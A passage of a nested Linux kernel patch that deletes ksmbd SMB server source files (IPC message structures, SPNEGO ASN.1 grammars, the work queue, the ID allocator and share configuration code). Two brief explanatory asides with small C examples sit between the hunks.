+-	__u32	handle;
+-	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
+-	__u32	reserved[16];				/* Reserved room */
+-};
+-
+-/*
+- * IPC user login response.
+- */
+-struct ksmbd_login_response {
+-	__u32	handle;
+-	__u32	gid;					/* group id */
+-	__u32	uid;					/* user id */
+-	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
+-	__u16	status;
+-	__u16	hash_sz;			/* hash size */
+-	__s8	hash[KSMBD_REQ_MAX_HASH_SZ];	/* password hash */
+-	__u32	reserved[16];			/* Reserved room */
+-};
+-
+-/*
+- * IPC request to fetch net share config.
+- */
+-struct ksmbd_share_config_request {
+-	__u32	handle;
+-	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME]; /* share name */
+-	__u32	reserved[16];		/* Reserved room */
+-};
+-
+-/*
+- * IPC response to the net share config request.
+- */
+-struct ksmbd_share_config_response {
+-	__u32	handle;
+-	__u32	flags;
+-	__u16	create_mask;
+-	__u16	directory_mask;
+-	__u16	force_create_mode;
+-	__u16	force_directory_mode;
+-	__u16	force_uid;
+-	__u16	force_gid;
+-	__s8	share_name[KSMBD_REQ_MAX_SHARE_NAME];
+-	__u32	reserved[112];		/* Reserved room */
+-	__u32	veto_list_sz;
+-	__s8	____payload[];
+-};
+-
+-#define KSMBD_SHARE_CONFIG_VETO_LIST(s)	((s)->____payload)
+-
+-static inline char *
+-ksmbd_share_config_path(struct ksmbd_share_config_response *sc)
+-{
+-	char *p = sc->____payload;
+-
+-	if (sc->veto_list_sz)
+-		p += sc->veto_list_sz + 1;
+-
+-	return p;
+-}
+-
+-/*
+- * IPC request for tree connection. This request includes session and tree
+- * connect info from client.
+- */
+-struct ksmbd_tree_connect_request {
+-	__u32	handle;
+-	__u16	account_flags;
+-	__u16	flags;
+-	__u64	session_id;
+-	__u64	connect_id;
+-	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ];
+-	__s8	share[KSMBD_REQ_MAX_SHARE_NAME];
+-	__s8	peer_addr[64];
+-	__u32	reserved[16];		/* Reserved room */
+-};
+-
+-/*
+- * IPC Response structure for tree connection.
+- */
+-struct ksmbd_tree_connect_response {
+-	__u32	handle;
+-	__u16	status;
+-	__u16	connection_flags;
+-	__u32	reserved[16];		/* Reserved room */
+-};
+-
+-/*
+- * IPC Request structure to disconnect a tree connection.
+- */
+-struct ksmbd_tree_disconnect_request {
+-	__u64	session_id;	/* session id */
+-	__u64	connect_id;	/* tree connection id */
+-	__u32	reserved[16];	/* Reserved room */
+-};
+-
+-/*
+- * IPC Request structure to log out a user account.
+- */
+-struct ksmbd_logout_request {
+-	__s8	account[KSMBD_REQ_MAX_ACCOUNT_NAME_SZ]; /* user account name */
+-	__u32	account_flags;
+-	__u32	reserved[16];				/* Reserved room */
+-};
+-
+-/*
+- * RPC command structure to send rpc request like srvsvc or wkssvc to
+- * IPC user daemon.
+- */
+-struct ksmbd_rpc_command {
+-	__u32	handle;
+-	__u32	flags;
+-	__u32	payload_sz;
+-	__u8	payload[];
+-};
+-
+-/*
+- * IPC Request Kerberos authentication
+- */
+-struct ksmbd_spnego_authen_request {
+-	__u32	handle;
+-	__u16	spnego_blob_len;	/* the length of spnego_blob */
+-	__u8	spnego_blob[];		/*
+-					 * the GSS token from SecurityBuffer of
+-					 * SMB2 SESSION SETUP request
+-					 */
+-};
+-
+-/*
+- * Response data which includes the GSS token and the session key generated by
+- * user daemon.
+- */
+-struct ksmbd_spnego_authen_response {
+-	__u32	handle;
+-	struct ksmbd_login_response login_response; /*
+-						     * the login response with
+-						     * a user identified by the
+-						     * GSS token from a client
+-						     */
+-	__u16	session_key_len; /* the length of the session key */
+-	__u16	spnego_blob_len; /*
+-				  * the length of the GSS token which will be
+-				  * stored in SecurityBuffer of SMB2 SESSION
+-				  * SETUP response
+-				  */
+-	__u8	payload[]; /* session key + AP_REP */
+-};
+-
+-/*
+- * This is also used as the NETLINK attribute type value.
+- *
+- * NOTE:
+- * Response message type value should be equal to
+- * request message type value + 1.
+- */
+-enum ksmbd_event {
+-	KSMBD_EVENT_UNSPEC			= 0,
+-	KSMBD_EVENT_HEARTBEAT_REQUEST,
+-
+-	KSMBD_EVENT_STARTING_UP,
+-	KSMBD_EVENT_SHUTTING_DOWN,
+-
+-	KSMBD_EVENT_LOGIN_REQUEST,
+-	KSMBD_EVENT_LOGIN_RESPONSE		= 5,
+-
+-	KSMBD_EVENT_SHARE_CONFIG_REQUEST,
+-	KSMBD_EVENT_SHARE_CONFIG_RESPONSE,
+-
+-	KSMBD_EVENT_TREE_CONNECT_REQUEST,
+-	KSMBD_EVENT_TREE_CONNECT_RESPONSE,
+-
+-	KSMBD_EVENT_TREE_DISCONNECT_REQUEST	= 10,
+-
+-	KSMBD_EVENT_LOGOUT_REQUEST,
+-
+-	KSMBD_EVENT_RPC_REQUEST,
+-	KSMBD_EVENT_RPC_RESPONSE,
+-
+-	KSMBD_EVENT_SPNEGO_AUTHEN_REQUEST,
+-	KSMBD_EVENT_SPNEGO_AUTHEN_RESPONSE	= 15,
+-
+-	KSMBD_EVENT_MAX
+-};
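
As the NOTE above spells out, a response's message type is always the request type plus one, so code can derive one from the other rather than keep a lookup table. A hypothetical helper (not part of this ABI) makes the convention concrete:

#include <stdio.h>

/* Hypothetical helper: derive the response type from the request type. */
static int ksmbd_resp_type(int req_type)
{
	return req_type + 1;
}

int main(void)
{
	enum { LOGIN_REQUEST = 4, LOGIN_RESPONSE = 5 };	/* values from above */

	printf("%d\n", ksmbd_resp_type(LOGIN_REQUEST) == LOGIN_RESPONSE);
	return 0;
}
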
+-
+-/*
+- * Enumeration for IPC tree connect status.
+- */
+-enum KSMBD_TREE_CONN_STATUS {
+-	KSMBD_TREE_CONN_STATUS_OK		= 0,
+-	KSMBD_TREE_CONN_STATUS_NOMEM,
+-	KSMBD_TREE_CONN_STATUS_NO_SHARE,
+-	KSMBD_TREE_CONN_STATUS_NO_USER,
+-	KSMBD_TREE_CONN_STATUS_INVALID_USER,
+-	KSMBD_TREE_CONN_STATUS_HOST_DENIED	= 5,
+-	KSMBD_TREE_CONN_STATUS_CONN_EXIST,
+-	KSMBD_TREE_CONN_STATUS_TOO_MANY_CONNS,
+-	KSMBD_TREE_CONN_STATUS_TOO_MANY_SESSIONS,
+-	KSMBD_TREE_CONN_STATUS_ERROR,
+-};
+-
+-/*
+- * User config flags.
+- */
+-#define KSMBD_USER_FLAG_INVALID		(0)
+-#define KSMBD_USER_FLAG_OK		BIT(0)
+-#define KSMBD_USER_FLAG_BAD_PASSWORD	BIT(1)
+-#define KSMBD_USER_FLAG_BAD_UID		BIT(2)
+-#define KSMBD_USER_FLAG_BAD_USER	BIT(3)
+-#define KSMBD_USER_FLAG_GUEST_ACCOUNT	BIT(4)
+-#define KSMBD_USER_FLAG_DELAY_SESSION	BIT(5)
+-
+-/*
+- * Share config flags.
+- */
+-#define KSMBD_SHARE_FLAG_INVALID		(0)
+-#define KSMBD_SHARE_FLAG_AVAILABLE		BIT(0)
+-#define KSMBD_SHARE_FLAG_BROWSEABLE		BIT(1)
+-#define KSMBD_SHARE_FLAG_WRITEABLE		BIT(2)
+-#define KSMBD_SHARE_FLAG_READONLY		BIT(3)
+-#define KSMBD_SHARE_FLAG_GUEST_OK		BIT(4)
+-#define KSMBD_SHARE_FLAG_GUEST_ONLY		BIT(5)
+-#define KSMBD_SHARE_FLAG_STORE_DOS_ATTRS	BIT(6)
+-#define KSMBD_SHARE_FLAG_OPLOCKS		BIT(7)
+-#define KSMBD_SHARE_FLAG_PIPE			BIT(8)
+-#define KSMBD_SHARE_FLAG_HIDE_DOT_FILES		BIT(9)
+-#define KSMBD_SHARE_FLAG_INHERIT_OWNER		BIT(10)
+-#define KSMBD_SHARE_FLAG_STREAMS		BIT(11)
+-#define KSMBD_SHARE_FLAG_FOLLOW_SYMLINKS	BIT(12)
+-#define KSMBD_SHARE_FLAG_ACL_XATTR		BIT(13)
+-#define KSMBD_SHARE_FLAG_UPDATE		BIT(14)
+-
+-/*
+- * Tree connect request flags.
+- */
+-#define KSMBD_TREE_CONN_FLAG_REQUEST_SMB1	(0)
+-#define KSMBD_TREE_CONN_FLAG_REQUEST_IPV6	BIT(0)
+-#define KSMBD_TREE_CONN_FLAG_REQUEST_SMB2	BIT(1)
+-
+-/*
+- * Tree connect flags.
+- */
+-#define KSMBD_TREE_CONN_FLAG_GUEST_ACCOUNT	BIT(0)
+-#define KSMBD_TREE_CONN_FLAG_READ_ONLY		BIT(1)
+-#define KSMBD_TREE_CONN_FLAG_WRITABLE		BIT(2)
+-#define KSMBD_TREE_CONN_FLAG_ADMIN_ACCOUNT	BIT(3)
+-#define KSMBD_TREE_CONN_FLAG_UPDATE		BIT(4)
+-
+-/*
+- * RPC over IPC.
+- */
+-#define KSMBD_RPC_METHOD_RETURN		BIT(0)
+-#define KSMBD_RPC_SRVSVC_METHOD_INVOKE	BIT(1)
+-#define KSMBD_RPC_SRVSVC_METHOD_RETURN	(KSMBD_RPC_SRVSVC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_WKSSVC_METHOD_INVOKE	BIT(2)
+-#define KSMBD_RPC_WKSSVC_METHOD_RETURN	(KSMBD_RPC_WKSSVC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_IOCTL_METHOD		(BIT(3) | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_OPEN_METHOD		BIT(4)
+-#define KSMBD_RPC_WRITE_METHOD		BIT(5)
+-#define KSMBD_RPC_READ_METHOD		(BIT(6) | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_CLOSE_METHOD		BIT(7)
+-#define KSMBD_RPC_RAP_METHOD		(BIT(8) | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_RESTRICTED_CONTEXT	BIT(9)
+-#define KSMBD_RPC_SAMR_METHOD_INVOKE	BIT(10)
+-#define KSMBD_RPC_SAMR_METHOD_RETURN	(KSMBD_RPC_SAMR_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
+-#define KSMBD_RPC_LSARPC_METHOD_INVOKE	BIT(11)
+-#define KSMBD_RPC_LSARPC_METHOD_RETURN	(KSMBD_RPC_LSARPC_METHOD_INVOKE | KSMBD_RPC_METHOD_RETURN)
+-
+-/*
+- * RPC status definitions.
+- */
+-#define KSMBD_RPC_OK			0
+-#define KSMBD_RPC_EBAD_FUNC		0x00000001
+-#define KSMBD_RPC_EACCESS_DENIED	0x00000005
+-#define KSMBD_RPC_EBAD_FID		0x00000006
+-#define KSMBD_RPC_ENOMEM		0x00000008
+-#define KSMBD_RPC_EBAD_DATA		0x0000000D
+-#define KSMBD_RPC_ENOTIMPLEMENTED	0x00000040
+-#define KSMBD_RPC_EINVALID_PARAMETER	0x00000057
+-#define KSMBD_RPC_EMORE_DATA		0x000000EA
+-#define KSMBD_RPC_EINVALID_LEVEL	0x0000007C
+-#define KSMBD_RPC_SOME_NOT_MAPPED	0x00000107
+-
+-#define KSMBD_CONFIG_OPT_DISABLED	0
+-#define KSMBD_CONFIG_OPT_ENABLED	1
+-#define KSMBD_CONFIG_OPT_AUTO		2
+-#define KSMBD_CONFIG_OPT_MANDATORY	3
+-
+-#endif /* _LINUX_KSMBD_SERVER_H */
+diff --git a/fs/ksmbd/ksmbd_spnego_negtokeninit.asn1 b/fs/ksmbd/ksmbd_spnego_negtokeninit.asn1
+deleted file mode 100644
+index 0065f191b54b7..0000000000000
+--- a/fs/ksmbd/ksmbd_spnego_negtokeninit.asn1
++++ /dev/null
+@@ -1,31 +0,0 @@
+-GSSAPI ::=
+-	[APPLICATION 0] IMPLICIT SEQUENCE {
+-		thisMech
+-			OBJECT IDENTIFIER ({ksmbd_gssapi_this_mech}),
+-		negotiationToken
+-			NegotiationToken
+-	}
+-
+-MechType ::= OBJECT IDENTIFIER ({ksmbd_neg_token_init_mech_type})
+-
+-MechTypeList ::= SEQUENCE OF MechType
+-
+-NegTokenInit ::=
+-	SEQUENCE {
+-		mechTypes
+-			[0] MechTypeList,
+-		reqFlags
+-			[1] BIT STRING OPTIONAL,
+-		mechToken
+-			[2] OCTET STRING OPTIONAL ({ksmbd_neg_token_init_mech_token}),
+-		mechListMIC
+-			[3] OCTET STRING OPTIONAL
+-	}
+-
+-NegotiationToken ::=
+-	CHOICE {
+-		negTokenInit
+-			[0] NegTokenInit,
+-		negTokenTarg
+-			[1] ANY
+-	}
+diff --git a/fs/ksmbd/ksmbd_spnego_negtokentarg.asn1 b/fs/ksmbd/ksmbd_spnego_negtokentarg.asn1
+deleted file mode 100644
+index 1151933e7b9c5..0000000000000
+--- a/fs/ksmbd/ksmbd_spnego_negtokentarg.asn1
++++ /dev/null
+@@ -1,19 +0,0 @@
+-GSSAPI ::=
+-	CHOICE {
+-		negTokenInit
+-			[0] ANY,
+-		negTokenTarg
+-			[1] NegTokenTarg
+-	}
+-
+-NegTokenTarg ::=
+-	SEQUENCE {
+-		negResult
+-			[0] ENUMERATED OPTIONAL,
+-		supportedMech
+-			[1] OBJECT IDENTIFIER OPTIONAL,
+-		responseToken
+-			[2] OCTET STRING OPTIONAL ({ksmbd_neg_token_targ_resp_token}),
+-		mechListMIC
+-			[3] OCTET STRING OPTIONAL
+-	}
+diff --git a/fs/ksmbd/ksmbd_work.c b/fs/ksmbd/ksmbd_work.c
+deleted file mode 100644
+index 14b9caebf7a4f..0000000000000
+--- a/fs/ksmbd/ksmbd_work.c
++++ /dev/null
+@@ -1,79 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/list.h>
+-#include <linux/mm.h>
+-#include <linux/slab.h>
+-#include <linux/workqueue.h>
+-
+-#include "server.h"
+-#include "connection.h"
+-#include "ksmbd_work.h"
+-#include "mgmt/ksmbd_ida.h"
+-
+-static struct kmem_cache *work_cache;
+-static struct workqueue_struct *ksmbd_wq;
+-
+-struct ksmbd_work *ksmbd_alloc_work_struct(void)
+-{
+-	struct ksmbd_work *work = kmem_cache_zalloc(work_cache, GFP_KERNEL);
+-
+-	if (work) {
+-		work->compound_fid = KSMBD_NO_FID;
+-		work->compound_pfid = KSMBD_NO_FID;
+-		INIT_LIST_HEAD(&work->request_entry);
+-		INIT_LIST_HEAD(&work->async_request_entry);
+-		INIT_LIST_HEAD(&work->fp_entry);
+-		INIT_LIST_HEAD(&work->interim_entry);
+-	}
+-	return work;
+-}
+-
+-void ksmbd_free_work_struct(struct ksmbd_work *work)
+-{
+-	WARN_ON(work->saved_cred != NULL);
+-
+-	kvfree(work->response_buf);
+-	kvfree(work->aux_payload_buf);
+-	kfree(work->tr_buf);
+-	kvfree(work->request_buf);
+-	if (work->async_id)
+-		ksmbd_release_id(&work->conn->async_ida, work->async_id);
+-	kmem_cache_free(work_cache, work);
+-}
+-
+-void ksmbd_work_pool_destroy(void)
+-{
+-	kmem_cache_destroy(work_cache);
+-}
+-
+-int ksmbd_work_pool_init(void)
+-{
+-	work_cache = kmem_cache_create("ksmbd_work_cache",
+-				       sizeof(struct ksmbd_work), 0,
+-				       SLAB_HWCACHE_ALIGN, NULL);
+-	if (!work_cache)
+-		return -ENOMEM;
+-	return 0;
+-}
+-
+-int ksmbd_workqueue_init(void)
+-{
+-	ksmbd_wq = alloc_workqueue("ksmbd-io", 0, 0);
+-	if (!ksmbd_wq)
+-		return -ENOMEM;
+-	return 0;
+-}
+-
+-void ksmbd_workqueue_destroy(void)
+-{
+-	destroy_workqueue(ksmbd_wq);
+-	ksmbd_wq = NULL;
+-}
+-
+-bool ksmbd_queue_work(struct ksmbd_work *work)
+-{
+-	return queue_work(ksmbd_wq, &work->work);
+-}
+diff --git a/fs/ksmbd/ksmbd_work.h b/fs/ksmbd/ksmbd_work.h
+deleted file mode 100644
+index 5ece58e40c979..0000000000000
+--- a/fs/ksmbd/ksmbd_work.h
++++ /dev/null
+@@ -1,117 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_WORK_H__
+-#define __KSMBD_WORK_H__
+-
+-#include <linux/ctype.h>
+-#include <linux/workqueue.h>
+-
+-struct ksmbd_conn;
+-struct ksmbd_session;
+-struct ksmbd_tree_connect;
+-
+-enum {
+-	KSMBD_WORK_ACTIVE = 0,
+-	KSMBD_WORK_CANCELLED,
+-	KSMBD_WORK_CLOSED,
+-};
+-
+-/* one of these for every pending CIFS request at the connection */
+-struct ksmbd_work {
+-	/* Server corresponding to this mid */
+-	struct ksmbd_conn               *conn;
+-	struct ksmbd_session            *sess;
+-	struct ksmbd_tree_connect       *tcon;
+-
+-	/* Pointer to received SMB header */
+-	void                            *request_buf;
+-	/* Response buffer */
+-	void                            *response_buf;
+-
+-	/* Read data buffer */
+-	void                            *aux_payload_buf;
+-
+-	/* Next cmd hdr in compound req buf*/
+-	int                             next_smb2_rcv_hdr_off;
+-	/* Next cmd hdr in compound rsp buf*/
+-	int                             next_smb2_rsp_hdr_off;
+-
+-	/*
+-	 * Current Local FID assigned compound response if SMB2 CREATE
+-	 * command is present in compound request
+-	 */
+-	u64				compound_fid;
+-	u64				compound_pfid;
+-	u64				compound_sid;
+-
+-	const struct cred		*saved_cred;
+-
+-	/* Number of granted credits */
+-	unsigned int			credits_granted;
+-
+-	/* response smb header size */
+-	unsigned int                    resp_hdr_sz;
+-	unsigned int                    response_sz;
+-	/* Read data count */
+-	unsigned int                    aux_payload_sz;
+-
+-	void				*tr_buf;
+-
+-	unsigned char			state;
+-	/* Multiple responses for one request e.g. SMB ECHO */
+-	bool                            multiRsp:1;
+-	/* No response for cancelled request */
+-	bool                            send_no_response:1;
+-	/* Request is encrypted */
+-	bool                            encrypted:1;
+-	/* Is this SYNC or ASYNC ksmbd_work */
+-	bool                            syncronous:1;
+-	bool                            need_invalidate_rkey:1;
+-
+-	unsigned int                    remote_key;
+-	/* cancel works */
+-	int                             async_id;
+-	void                            **cancel_argv;
+-	void                            (*cancel_fn)(void **argv);
+-
+-	struct work_struct              work;
+-	/* List head at conn->requests */
+-	struct list_head                request_entry;
+-	/* List head at conn->async_requests */
+-	struct list_head                async_request_entry;
+-	struct list_head                fp_entry;
+-	struct list_head                interim_entry;
+-};
+-
+-/**
+- * ksmbd_resp_buf_next - Get next buffer on compound response.
+- * @work: smb work containing response buffer
+- */
+-static inline void *ksmbd_resp_buf_next(struct ksmbd_work *work)
+-{
+-	return work->response_buf + work->next_smb2_rsp_hdr_off + 4;
+-}
+-
+-/**
+- * ksmbd_req_buf_next - Get next buffer on compound request.
+- * @work: smb work containing request buffer
+- */
+-static inline void *ksmbd_req_buf_next(struct ksmbd_work *work)
+-{
+-	return work->request_buf + work->next_smb2_rcv_hdr_off + 4;
+-}
+-
+-struct ksmbd_work *ksmbd_alloc_work_struct(void);
+-void ksmbd_free_work_struct(struct ksmbd_work *work);
+-
+-void ksmbd_work_pool_destroy(void);
+-int ksmbd_work_pool_init(void);
+-
+-int ksmbd_workqueue_init(void);
+-void ksmbd_workqueue_destroy(void);
+-bool ksmbd_queue_work(struct ksmbd_work *work);
+-
+-#endif /* __KSMBD_WORK_H__ */
+diff --git a/fs/ksmbd/mgmt/ksmbd_ida.c b/fs/ksmbd/mgmt/ksmbd_ida.c
+deleted file mode 100644
+index 54194d959a5ef..0000000000000
+--- a/fs/ksmbd/mgmt/ksmbd_ida.c
++++ /dev/null
+@@ -1,46 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include "ksmbd_ida.h"
+-
+-static inline int __acquire_id(struct ida *ida, int from, int to)
+-{
+-	return ida_simple_get(ida, from, to, GFP_KERNEL);
+-}
+-
+-int ksmbd_acquire_smb2_tid(struct ida *ida)
+-{
+-	int id;
+-
+-	id = __acquire_id(ida, 1, 0xFFFFFFFF);
+-
+-	return id;
+-}
+-
+-int ksmbd_acquire_smb2_uid(struct ida *ida)
+-{
+-	int id;
+-
+-	id = __acquire_id(ida, 1, 0);
+-	if (id == 0xFFFE)
+-		id = __acquire_id(ida, 1, 0);
+-
+-	return id;
+-}
+-
+-int ksmbd_acquire_async_msg_id(struct ida *ida)
+-{
+-	return __acquire_id(ida, 1, 0);
+-}
+-
+-int ksmbd_acquire_id(struct ida *ida)
+-{
+-	return __acquire_id(ida, 0, 0);
+-}
+-
+-void ksmbd_release_id(struct ida *ida, int id)
+-{
+-	ida_simple_remove(ida, id);
+-}
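
ksmbd_acquire_smb2_uid() above retries once when the allocator returns 0xFFFE, which the header below documents as reserved since LAN Manager 1.0. A toy allocator showing the same skip-a-reserved-value idea (illustrative only; the kernel uses an IDA):

#include <stdio.h>

static int next_id = 1;

static int acquire_id(void)
{
	return next_id++;		/* toy stand-in for ida_simple_get() */
}

static int acquire_smb2_uid(void)
{
	int id = acquire_id();

	if (id == 0xFFFE)		/* reserved value: take the next one */
		id = acquire_id();
	return id;
}

int main(void)
{
	next_id = 0xFFFE;		/* force the reserved value to come up */
	printf("uid: %#x\n", acquire_smb2_uid());
	return 0;
}
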
+diff --git a/fs/ksmbd/mgmt/ksmbd_ida.h b/fs/ksmbd/mgmt/ksmbd_ida.h
+deleted file mode 100644
+index 2bc07b16cfde9..0000000000000
+--- a/fs/ksmbd/mgmt/ksmbd_ida.h
++++ /dev/null
+@@ -1,34 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_IDA_MANAGEMENT_H__
+-#define __KSMBD_IDA_MANAGEMENT_H__
+-
+-#include <linux/slab.h>
+-#include <linux/idr.h>
+-
+-/*
+- * 2.2.1.6.7 TID Generation
+- *    The value 0xFFFF MUST NOT be used as a valid TID. All other
+- *    possible values for TID, including zero (0x0000), are valid.
+- *    The value 0xFFFF is used to specify all TIDs or no TID,
+- *    depending upon the context in which it is used.
+- */
+-int ksmbd_acquire_smb2_tid(struct ida *ida);
+-
+-/*
+- * 2.2.1.6.8 UID Generation
+- *    The value 0xFFFE was declared reserved in the LAN Manager 1.0
+- *    documentation, so a value of 0xFFFE SHOULD NOT be used as a
+- *    valid UID.<21> All other possible values for a UID, excluding
+- *    zero (0x0000), are valid.
+- */
+-int ksmbd_acquire_smb2_uid(struct ida *ida);
+-int ksmbd_acquire_async_msg_id(struct ida *ida);
+-
+-int ksmbd_acquire_id(struct ida *ida);
+-
+-void ksmbd_release_id(struct ida *ida, int id);
+-#endif /* __KSMBD_IDA_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/mgmt/share_config.c b/fs/ksmbd/mgmt/share_config.c
+deleted file mode 100644
+index 328a412259dc1..0000000000000
+--- a/fs/ksmbd/mgmt/share_config.c
++++ /dev/null
+@@ -1,234 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/list.h>
+-#include <linux/jhash.h>
+-#include <linux/slab.h>
+-#include <linux/rwsem.h>
+-#include <linux/parser.h>
+-#include <linux/namei.h>
+-#include <linux/sched.h>
+-#include <linux/mm.h>
+-
+-#include "share_config.h"
+-#include "user_config.h"
+-#include "user_session.h"
+-#include "../transport_ipc.h"
+-#include "../misc.h"
+-
+-#define SHARE_HASH_BITS		3
+-static DEFINE_HASHTABLE(shares_table, SHARE_HASH_BITS);
+-static DECLARE_RWSEM(shares_table_lock);
+-
+-struct ksmbd_veto_pattern {
+-	char			*pattern;
+-	struct list_head	list;
+-};
+-
+-static unsigned int share_name_hash(const char *name)
+-{
+-	return jhash(name, strlen(name), 0);
+-}
+-
+-static void kill_share(struct ksmbd_share_config *share)
+-{
+-	while (!list_empty(&share->veto_list)) {
+-		struct ksmbd_veto_pattern *p;
+-
+-		p = list_entry(share->veto_list.next,
+-			       struct ksmbd_veto_pattern,
+-			       list);
+-		list_del(&p->list);
+-		kfree(p->pattern);
+-		kfree(p);
+-	}
+-
+-	if (share->path)
+-		path_put(&share->vfs_path);
+-	kfree(share->name);
+-	kfree(share->path);
+-	kfree(share);
+-}
+-
+-void ksmbd_share_config_del(struct ksmbd_share_config *share)
+-{
+-	down_write(&shares_table_lock);
+-	hash_del(&share->hlist);
+-	up_write(&shares_table_lock);
+-}
+-
+-void __ksmbd_share_config_put(struct ksmbd_share_config *share)
+-{
+-	ksmbd_share_config_del(share);
+-	kill_share(share);
+-}
+-
+-static struct ksmbd_share_config *
+-__get_share_config(struct ksmbd_share_config *share)
+-{
+-	if (!atomic_inc_not_zero(&share->refcount))
+-		return NULL;
+-	return share;
+-}
+-
+-static struct ksmbd_share_config *__share_lookup(const char *name)
+-{
+-	struct ksmbd_share_config *share;
+-	unsigned int key = share_name_hash(name);
+-
+-	hash_for_each_possible(shares_table, share, hlist, key) {
+-		if (!strcmp(name, share->name))
+-			return share;
+-	}
+-	return NULL;
+-}
+-
+-static int parse_veto_list(struct ksmbd_share_config *share,
+-			   char *veto_list,
+-			   int veto_list_sz)
+-{
+-	int sz = 0;
+-
+-	if (!veto_list_sz)
+-		return 0;
+-
+-	while (veto_list_sz > 0) {
+-		struct ksmbd_veto_pattern *p;
+-
+-		sz = strlen(veto_list);
+-		if (!sz)
+-			break;
+-
+-		p = kzalloc(sizeof(struct ksmbd_veto_pattern), GFP_KERNEL);
+-		if (!p)
+-			return -ENOMEM;
+-
+-		p->pattern = kstrdup(veto_list, GFP_KERNEL);
+-		if (!p->pattern) {
+-			kfree(p);
+-			return -ENOMEM;
+-		}
+-
+-		list_add(&p->list, &share->veto_list);
+-
+-		veto_list += sz + 1;
+-		veto_list_sz -= (sz + 1);
+-	}
+-
+-	return 0;
+-}
+-
+-static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+-						       const char *name)
+-{
+-	struct ksmbd_share_config_response *resp;
+-	struct ksmbd_share_config *share = NULL;
+-	struct ksmbd_share_config *lookup;
+-	int ret;
+-
+-	resp = ksmbd_ipc_share_config_request(name);
+-	if (!resp)
+-		return NULL;
+-
+-	if (resp->flags == KSMBD_SHARE_FLAG_INVALID)
+-		goto out;
+-
+-	if (*resp->share_name) {
+-		char *cf_resp_name;
+-		bool equal;
+-
+-		cf_resp_name = ksmbd_casefold_sharename(um, resp->share_name);
+-		if (IS_ERR(cf_resp_name))
+-			goto out;
+-		equal = !strcmp(cf_resp_name, name);
+-		kfree(cf_resp_name);
+-		if (!equal)
+-			goto out;
+-	}
+-
+-	share = kzalloc(sizeof(struct ksmbd_share_config), GFP_KERNEL);
+-	if (!share)
+-		goto out;
+-
+-	share->flags = resp->flags;
+-	atomic_set(&share->refcount, 1);
+-	INIT_LIST_HEAD(&share->veto_list);
+-	share->name = kstrdup(name, GFP_KERNEL);
+-
+-	if (!test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
+-		share->path = kstrdup(ksmbd_share_config_path(resp),
+-				      GFP_KERNEL);
+-		if (share->path)
+-			share->path_sz = strlen(share->path);
+-		share->create_mask = resp->create_mask;
+-		share->directory_mask = resp->directory_mask;
+-		share->force_create_mode = resp->force_create_mode;
+-		share->force_directory_mode = resp->force_directory_mode;
+-		share->force_uid = resp->force_uid;
+-		share->force_gid = resp->force_gid;
+-		ret = parse_veto_list(share,
+-				      KSMBD_SHARE_CONFIG_VETO_LIST(resp),
+-				      resp->veto_list_sz);
+-		if (!ret && share->path) {
+-			ret = kern_path(share->path, 0, &share->vfs_path);
+-			if (ret) {
+-				ksmbd_debug(SMB, "failed to access '%s'\n",
+-					    share->path);
+-				/* Avoid put_path() */
+-				kfree(share->path);
+-				share->path = NULL;
+-			}
+-		}
+-		if (ret || !share->name) {
+-			kill_share(share);
+-			share = NULL;
+-			goto out;
+-		}
+-	}
+-
+-	down_write(&shares_table_lock);
+-	lookup = __share_lookup(name);
+-	if (lookup)
+-		lookup = __get_share_config(lookup);
+-	if (!lookup) {
+-		hash_add(shares_table, &share->hlist, share_name_hash(name));
+-	} else {
+-		kill_share(share);
+-		share = lookup;
+-	}
+-	up_write(&shares_table_lock);
+-
+-out:
+-	kvfree(resp);
+-	return share;
+-}
+-
+-struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
+-						  const char *name)
+-{
+-	struct ksmbd_share_config *share;
+-
+-	down_read(&shares_table_lock);
+-	share = __share_lookup(name);
+-	if (share)
+-		share = __get_share_config(share);
+-	up_read(&shares_table_lock);
+-
+-	if (share)
+-		return share;
+-	return share_config_request(um, name);
+-}
+-
+-bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
+-			       const char *filename)
+-{
+-	struct ksmbd_veto_pattern *p;
+-
+-	list_for_each_entry(p, &share->veto_list, list) {
+-		if (match_wildcard(p->pattern, filename))
+-			return true;
+-	}
+-	return false;
+-}
+diff --git a/fs/ksmbd/mgmt/share_config.h b/fs/ksmbd/mgmt/share_config.h
+deleted file mode 100644
+index 3fd3382939421..0000000000000
+--- a/fs/ksmbd/mgmt/share_config.h
++++ /dev/null
+@@ -1,82 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __SHARE_CONFIG_MANAGEMENT_H__
+-#define __SHARE_CONFIG_MANAGEMENT_H__
+-
+-#include <linux/workqueue.h>
+-#include <linux/hashtable.h>
+-#include <linux/path.h>
+-#include <linux/unicode.h>
+-
